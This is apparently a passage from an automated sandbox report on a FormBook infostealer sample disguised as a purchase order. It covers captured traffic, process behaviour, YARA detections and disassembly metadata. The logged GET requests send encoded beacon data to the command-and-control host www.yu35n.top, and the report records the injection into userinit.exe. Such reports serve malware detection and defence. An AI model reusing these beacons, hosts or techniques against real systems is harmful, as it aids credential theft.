                                                    Data Raw: 4c 34 4d 6c 3d 51 42 53 6a 73 67 57 76 52 4e 34 35 31 6b 30 75 36 67 46 6c 7a 66 75 4a 6e 74 52 4a 6e 58 38 5a 36 69 73 5a 6e 71 47 35 65 67 61 4f 31 59 35 71 75 77 53 71 49 4a 74 63 6c 4c 6c 36 4e 69 78 2b 66 70 4f 79 48 37 4f 4d 75 4d 6f 48 5a 70 75 30 56 75 69 6e 42 35 44 58 7a 4d 4d 58 4c 53 63 77 73 42 61 78 35 57 33 6a 6c 51 59 72 78 75 76 39 48 67 6e 42 46 39 42 54 5a 4a 58 65 72 65 44 39 4e 4b 44 74 46 65 35 52 59 77 77 79 70 4e 2f 65 67 4d 5a 4e 4e 71 76 4c 69 61 2f 30 6e 4a 57 74 75 57 50 30 69 77 43 41 34 49 64 45 48 73 6d 53 7a 42 33 35 47 45 6d 69 51 62 76 6d 65 78 50 31 74 7a 36 55 35 41 38 39 41 30 76 58 57 64 55 4f 42 57 58 67 63 46 50 49 67 53 44 61 75 51 32 56 30 48 6c 77 2b 69 45 44 37 54 71 33 31 36 59 76 55 69 6f 58 34 49 39 77 6b 58 78 4a 35 37 77 62 37 41 63 6f 73 64 68 45 65 50 4a 6c 4f 46 4a 6e 6a 76 54 57 2b 6a 7a 48 57 61 33 44 35 66 58 46 4f 42 47 52 59 74 61 75 33 2b 75 54 65 57 34 7a 54 5a 49 58 4d 7a 5a 39 68 71 41 64 61 49 2f 74 58 79 55 44 43 51 48 70 38 36 46 74 52 [TRUNCATED]
                                                    Data Ascii: L4Ml=QBSjsgWvRN451k0u6gFlzfuJntRJnX8Z6isZnqG5egaO1Y5quwSqIJtclLl6Nix+fpOyH7OMuMoHZpu0VuinB5DXzMMXLScwsBax5W3jlQYrxuv9HgnBF9BTZJXereD9NKDtFe5RYwwypN/egMZNNqvLia/0nJWtuWP0iwCA4IdEHsmSzB35GEmiQbvmexP1tz6U5A89A0vXWdUOBWXgcFPIgSDauQ2V0Hlw+iED7Tq316YvUioX4I9wkXxJ57wb7AcosdhEePJlOFJnjvTW+jzHWa3D5fXFOBGRYtau3+uTeW4zTZIXMzZ9hqAdaI/tXyUDCQHp86FtR107YvFpsgqzGH82yt6rUNESq8bgoQ7li9qnC4GEIlgtLYg57tdho04sVDR/hQ0UbiSUCjhvlS7dxQqF/w5BtY11tykY4U+uhNYWZalnkBBx4w9/S0AdN3h67Ql9xTRvLaAY75YSoKzoKw5UvYdCQk0iNP2AnJF5nI58A3jVftIA0Lm8aTKqsasi9SmA536d4hrJwuEvvdTAOvlHFEPsajqmpEDfi34jmhK7C8wSTzvthGmf5GCw8tnouMbhY00mqYg5socEptVcnQL1MhimA+lQLNKuCBKnqTJW4RubRomUFeYiY7hsKYPxJht/FH40NravUMOtipnfGi6eWBckEF9DVlQxJVj3ThPSXv+FI48bFpyNLaPlifbdU2N7LifVet3Iced0CeQ2TrNAuKU736kqGXGZdmAH6bicWS8qiFINX5PoqNikw0lUp4UVrEhvxCo6L5QzAcmMqfamsEXzrdRwc6g/AQW0PjQVarHnbk1WTb3gQ2M0vm7m3hppsFothmefFUsI8qkuTrFByxU4qAnUpD7q0QApkyns3wM5ChJLrngtRsxHqG3/5QmkHKDXXIHU/QQ+XSs6VTPo9yul1OZtAg6ZeDNjfAf4OsP0jTZHxG8sEtZnjBdWZDYXK/CRbKCAYJ1NqSqU5iaZgfqtiWUKCoAFtPfbIjH [TRUNCATED]
                                                    Sep 24, 2024 17:19:38.168473005 CEST312INHTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Tue, 24 Sep 2024 15:19:37 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 148
                                                    Connection: close
                                                    ETag: "66ea4ae9-94"
                                                    Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    36192.168.2.86372838.47.232.14480
                                                    TimestampBytes transferredDirectionData
                                                    Sep 24, 2024 17:19:39.561570883 CEST456OUTGET /wqu9/?L4Ml=dD6DvXSgWvkhkExz9ANGg62vkcZOvm8u+S0LjtafD2Cb45k+h0GLDfxxrLcTCDpid42VLL2gjPURfP6UcdvjDLDV680rGTEuq0qU4X+foBMe6t+yESiAaeFaZa7j0sbyXQ==&VX=XZGx- HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-us
                                                    Host: www.yu35n.top
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                    Sep 24, 2024 17:19:40.562958956 CEST312INHTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Tue, 24 Sep 2024 15:19:40 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 148
                                                    Connection: close
                                                    ETag: "66ea4ae9-94"
                                                    Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    High Level Behavior Distribution

                                                    Click to dive into process behavior distribution

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    General

                                                    Target ID:0
                                                    Start time:11:16:26
                                                    Start date:24/09/2024
                                                    Path:C:\Users\user\Desktop\PO-000001488.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\PO-000001488.exe"
                                                    Imagebase:0xca0000
                                                    File size:892'928 bytes
                                                    MD5 hash:DDC551BB780301787EE4CC982AF331A9
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:3
                                                    Start time:11:16:40
                                                    Start date:24/09/2024
                                                    Path:C:\Users\user\Desktop\PO-000001488.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\PO-000001488.exe"
                                                    Imagebase:0x8c0000
                                                    File size:892'928 bytes
                                                    MD5 hash:DDC551BB780301787EE4CC982AF331A9
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1769630236.00000000013A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.1769630236.00000000013A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1769083261.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.1769083261.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1770519170.0000000003FF0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.1770519170.0000000003FF0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:7
                                                    Start time:11:16:52
                                                    Start date:24/09/2024
                                                    Path:C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe"
                                                    Imagebase:0x4b0000
                                                    File size:140'800 bytes
                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3308933092.00000000057C0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3308933092.00000000057C0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                    Reputation:high
                                                    Has exited:false

                                                    General

                                                    Target ID:8
                                                    Start time:11:16:54
                                                    Start date:24/09/2024
                                                    Path:C:\Windows\SysWOW64\userinit.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\SysWOW64\userinit.exe"
                                                    Imagebase:0xf80000
                                                    File size:45'568 bytes
                                                    MD5 hash:24892AC6E39679E3BD3B0154DE97C53A
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3308944674.0000000003080000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.3308944674.0000000003080000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3307756614.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.3307756614.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3308999188.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.3308999188.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    Reputation:low
                                                    Has exited:false

                                                    General

                                                    Target ID:9
                                                    Start time:11:17:06
                                                    Start date:24/09/2024
                                                    Path:C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe"
                                                    Imagebase:0x4b0000
                                                    File size:140'800 bytes
                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3311216289.00000000055A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.3311216289.00000000055A0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                    Reputation:high
                                                    Has exited:false

                                                    General

                                                    Target ID:12
                                                    Start time:11:17:23
                                                    Start date:24/09/2024
                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                    Imagebase:0x7ff6d20e0000
                                                    File size:676'768 bytes
                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Disassembly

                                                    Reset < >

                                                      Execution Graph

                                                      Execution Coverage:8.4%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:39
                                                      Total number of Limit Nodes:3
                                                      execution_graph 15641 1584668 15642 158467a 15641->15642 15643 1584686 15642->15643 15645 1584778 15642->15645 15646 158479d 15645->15646 15650 1584878 15646->15650 15654 1584888 15646->15654 15652 1584888 15650->15652 15651 158498c 15651->15651 15652->15651 15658 15844b4 15652->15658 15655 15848af 15654->15655 15656 15844b4 CreateActCtxA 15655->15656 15657 158498c 15655->15657 15656->15657 15659 1585918 CreateActCtxA 15658->15659 15661 15859db 15659->15661 15662 158acd0 15663 158acd1 15662->15663 15667 158adc8 15663->15667 15672 158adb7 15663->15672 15664 158acdf 15669 158adc9 15667->15669 15668 158adfc 15668->15664 15669->15668 15670 158b000 GetModuleHandleW 15669->15670 15671 158b02d 15670->15671 15671->15664 15674 158adc8 15672->15674 15673 158adfc 15673->15664 15674->15673 15675 158b000 GetModuleHandleW 15674->15675 15676 158b02d 15675->15676 15676->15664 15677 158d060 15678 158d0a6 GetCurrentProcess 15677->15678 15680 158d0f8 GetCurrentThread 15678->15680 15681 158d0f1 15678->15681 15682 158d12e 15680->15682 15683 158d135 GetCurrentProcess 15680->15683 15681->15680 15682->15683 15684 158d16b 15683->15684 15685 158d193 GetCurrentThreadId 15684->15685 15686 158d1c4 15685->15686 15687 158d6b0 DuplicateHandle 15688 158d746 15687->15688

                                                      Executed Functions

                                                      Function 0158D051 Relevance: 6.1, APIs: 4, Instructions: 131threadCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • GetCurrentProcess.KERNEL32 ref: 0158D0DE
                                                      • GetCurrentThread.KERNEL32 ref: 0158D11B
                                                      • GetCurrentProcess.KERNEL32 ref: 0158D158
                                                      • GetCurrentThreadId.KERNEL32 ref: 0158D1B1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1601647700.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1580000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID: Current$ProcessThread
                                                      • String ID:
                                                      • API String ID: 2063062207-0
                                                      • Opcode ID: bf01eeb2518f1a3a8a135ba7aca4b66f059dbd2ca2467bb864d5e54651db04c2
                                                      • Instruction ID: 6cbe84d567b5c1011520cf479346f171a2d0745b73f9d0755d5af8521f530779
                                                      • Opcode Fuzzy Hash: bf01eeb2518f1a3a8a135ba7aca4b66f059dbd2ca2467bb864d5e54651db04c2
                                                      • Instruction Fuzzy Hash: 435157B0901349CFEB14EFA9D54879EBBF1BF88314F208459E419B7290DB399944CF65
                                                      Function 0158D060 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • GetCurrentProcess.KERNEL32 ref: 0158D0DE
                                                      • GetCurrentThread.KERNEL32 ref: 0158D11B
                                                      • GetCurrentProcess.KERNEL32 ref: 0158D158
                                                      • GetCurrentThreadId.KERNEL32 ref: 0158D1B1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1601647700.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1580000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID: Current$ProcessThread
                                                      • String ID:
                                                      • API String ID: 2063062207-0
                                                      • Opcode ID: 8b6eb49cf6efa3e6d244c6186652ffd3da18050cad73b6f3736c846fb08dabf3
                                                      • Instruction ID: 410652ff3c64f52692e8638086e35cf1efb0f16fd409055b76c85b9d6eceecdb
                                                      • Opcode Fuzzy Hash: 8b6eb49cf6efa3e6d244c6186652ffd3da18050cad73b6f3736c846fb08dabf3
                                                      • Instruction Fuzzy Hash: BD5157B090130ACFEB54EFAAD548B9EBBF1BF88314F208419E419B7290DB395944CF65
                                                      Function 0158ADC8 Relevance: 1.7, APIs: 1, Instructions: 197COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 44 158adc8-158add7 46 158add9-158ade6 call 158a0ec 44->46 47 158ae03-158ae07 44->47 52 158ade8 46->52 53 158adfc 46->53 48 158ae09-158ae13 47->48 49 158ae1b-158ae5c 47->49 48->49 56 158ae69-158ae77 49->56 57 158ae5e-158ae66 49->57 100 158adee call 158b050 52->100 101 158adee call 158b060 52->101 53->47 59 158ae79-158ae7e 56->59 60 158ae9b-158ae9d 56->60 57->56 58 158adf4-158adf6 58->53 61 158af38-158aff8 58->61 63 158ae89 59->63 64 158ae80-158ae87 call 158a0f8 59->64 62 158aea0-158aea7 60->62 95 158affa-158affd 61->95 96 158b000-158b02b GetModuleHandleW 61->96 67 158aea9-158aeb1 62->67 68 158aeb4-158aebb 62->68 66 158ae8b-158ae99 63->66 64->66 66->62 67->68 70 158aec8-158aeca call 158a108 68->70 71 158aebd-158aec5 68->71 74 158aecf-158aed1 70->74 71->70 76 158aede-158aee3 74->76 77 158aed3-158aedb 74->77 78 158af01-158af0e 76->78 79 158aee5-158aeec 76->79 77->76 86 158af10-158af2e 78->86 87 158af31-158af37 78->87 79->78 81 158aeee-158aefe call 158a118 call 158a128 79->81 81->78 86->87 95->96 97 158b02d-158b033 96->97 98 158b034-158b048 96->98 97->98 100->58 101->58
                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 0158B01E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1601647700.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1580000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      • Opcode ID: 0b2ed524e12a291cc5629dd9b84263384ec447ebfcb39ef93c929f78d759b57a
                                                      • Instruction ID: d1c3717bc45fa2a505e2827e441e71070a3a271697bb2b5c2ad3c3d19509c8d9
                                                      • Opcode Fuzzy Hash: 0b2ed524e12a291cc5629dd9b84263384ec447ebfcb39ef93c929f78d759b57a
                                                      • Instruction Fuzzy Hash: 71713870A00B068FD724EF29D44475ABBF1FF88200F108A2ED596EBB90D775E845CB91
                                                      Function 0158590C Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 102 158590c-1585916 103 1585918-15859d9 CreateActCtxA 102->103 105 15859db-15859e1 103->105 106 15859e2-1585a3c 103->106 105->106 113 1585a4b-1585a4f 106->113 114 1585a3e-1585a41 106->114 115 1585a60 113->115 116 1585a51-1585a5d 113->116 114->113 118 1585a61 115->118 116->115 118->118
                                                      APIs
                                                      • CreateActCtxA.KERNEL32(?), ref: 015859C9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1601647700.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1580000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID: Create
                                                      • String ID:
                                                      • API String ID: 2289755597-0
                                                      • Opcode ID: 9243a43acfec6f5ee2775a196a0f74cb312545dfa378afb869ebbc2387c5e903
                                                      • Instruction ID: 31b8bfdf3d46b9db81332dc4d9ce763245df5c0aedc0e04702cb339fd1ef4475
                                                      • Opcode Fuzzy Hash: 9243a43acfec6f5ee2775a196a0f74cb312545dfa378afb869ebbc2387c5e903
                                                      • Instruction Fuzzy Hash: 0141FEB1C01319CFDB24DFA9C884BCEBBB1BF89714F20815AD508AB255DB756945CF90
                                                      Function 015844B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 119 15844b4-15859d9 CreateActCtxA 122 15859db-15859e1 119->122 123 15859e2-1585a3c 119->123 122->123 130 1585a4b-1585a4f 123->130 131 1585a3e-1585a41 123->131 132 1585a60 130->132 133 1585a51-1585a5d 130->133 131->130 135 1585a61 132->135 133->132 135->135
                                                      APIs
                                                      • CreateActCtxA.KERNEL32(?), ref: 015859C9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1601647700.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1580000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID: Create
                                                      • String ID:
                                                      • API String ID: 2289755597-0
                                                      • Opcode ID: 38c87ed7df69fdef1711a543cbf535347b772ec9b4ccd8bc2d47f7c1f0a311e9
                                                      • Instruction ID: 66e9b225df0df0e5d6049be82eb3e16b319f1679c41cc26e70c4cb806c27cbe3
                                                      • Opcode Fuzzy Hash: 38c87ed7df69fdef1711a543cbf535347b772ec9b4ccd8bc2d47f7c1f0a311e9
                                                      • Instruction Fuzzy Hash: 3141DF70C0071DCBDB24EFA9C88478EBBF5BB49714F20806AD508AB255DB756945CF90
                                                      Function 0158D6B0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 141 158d6b0-158d744 DuplicateHandle 142 158d74d-158d76a 141->142 143 158d746-158d74c 141->143 143->142
                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0158D737
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1601647700.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1580000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID:
                                                      • API String ID: 3793708945-0
                                                      • Opcode ID: 312dfeac3b656d49acf9e3b1caab5462c6034579c3e57ef70ff40e82a5152e4b
                                                      • Instruction ID: 2ffad1557db311120ef69e20efe43e6d00645fdf2aa46a6282670ecafe155040
                                                      • Opcode Fuzzy Hash: 312dfeac3b656d49acf9e3b1caab5462c6034579c3e57ef70ff40e82a5152e4b
                                                      • Instruction Fuzzy Hash: C721E4B5900249DFDB10DFAAD884ADEBFF9FB48310F14841AE914A7350D378A940CFA5
                                                      Function 0158D6A9 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 136 158d6a9-158d744 DuplicateHandle 137 158d74d-158d76a 136->137 138 158d746-158d74c 136->138 138->137
                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0158D737
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1601647700.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1580000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID:
                                                      • API String ID: 3793708945-0
                                                      • Opcode ID: 668ae83040a31efd01155aebf32d985e801a01c7453097a84ed92a91f3ff69cb
                                                      • Instruction ID: f565b6be3a1a405e56220d66e81e520dfe4f5ca883a71f276d03b43c77295198
                                                      • Opcode Fuzzy Hash: 668ae83040a31efd01155aebf32d985e801a01c7453097a84ed92a91f3ff69cb
                                                      • Instruction Fuzzy Hash: 3B21E3B5900249DFDB10DFAAD985AEEBBF5BB48320F14841AE914B7250D378A940CF64
                                                      Function 0158AFB8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 146 158afb8-158aff8 147 158affa-158affd 146->147 148 158b000-158b02b GetModuleHandleW 146->148 147->148 149 158b02d-158b033 148->149 150 158b034-158b048 148->150 149->150
                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 0158B01E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1601647700.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1580000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      • Opcode ID: 9b82425e93272c9008da5d918f60f5b0e90aec116d05b8e7ee1376266d303e2c
                                                      • Instruction ID: 25073ccdf54f3b4195da957b5b6e181370694c03fbaca5d72330df364a84c8bd
                                                      • Opcode Fuzzy Hash: 9b82425e93272c9008da5d918f60f5b0e90aec116d05b8e7ee1376266d303e2c
                                                      • Instruction Fuzzy Hash: 1C11D2B5C00349CFDB14DF9AD444B9EFBF8AB88214F10841AD529B7610D379A545CFA5
                                                      Function 0152D1FC Relevance: .1, Instructions: 76COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1601350882.000000000152D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0152D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_152d000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 30be86599ed1b45687de0ebef78ab3f92e8653d60768632b63171a2c53346756
                                                      • Instruction ID: a957970add992cba9e6bcbf2eb062594dcd5d3a23aa832fca0433d624a9e8818
                                                      • Opcode Fuzzy Hash: 30be86599ed1b45687de0ebef78ab3f92e8653d60768632b63171a2c53346756
                                                      • Instruction Fuzzy Hash: 0F21C172504344DFDB05DF94D9C4B2ABBB5FB8A220F24C569E9090E286C336D416CBA2
                                                      Function 0152D4C4 Relevance: .1, Instructions: 75COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1601350882.000000000152D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0152D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_152d000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4ea38359e90bbc7b73060901df9175a99228ae55476f15c4aeba9895a7a056fe
                                                      • Instruction ID: 98080dc87082baad44468f12adcefab34b7d182594f779aa26cec7d945aeb67e
                                                      • Opcode Fuzzy Hash: 4ea38359e90bbc7b73060901df9175a99228ae55476f15c4aeba9895a7a056fe
                                                      • Instruction Fuzzy Hash: 37210372604240DFDB05DF54D9C0B2ABFB5FB88328F20C569E8090F296C376D456CBA2
                                                      Function 0153D1D4 Relevance: .1, Instructions: 72COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1601425153.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_153d000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5249c52d44ca146820615088b7970fe0ba8129fe48b77b666c0c9fa84bfb617a
                                                      • Instruction ID: 05a6c333acceefd396c22d599cb5d7b30d5ae3743a8296a0da90f6d67a1bf249
                                                      • Opcode Fuzzy Hash: 5249c52d44ca146820615088b7970fe0ba8129fe48b77b666c0c9fa84bfb617a
                                                      • Instruction Fuzzy Hash: 65210071604300AFDB02DF94D980B2ABBB1FBC4224F60CA6DE8494F282C33AD406CA61
                                                      Function 0153D01C Relevance: .1, Instructions: 72COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1601425153.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_153d000_PO-000001488.jbxd
                                                      Similarity
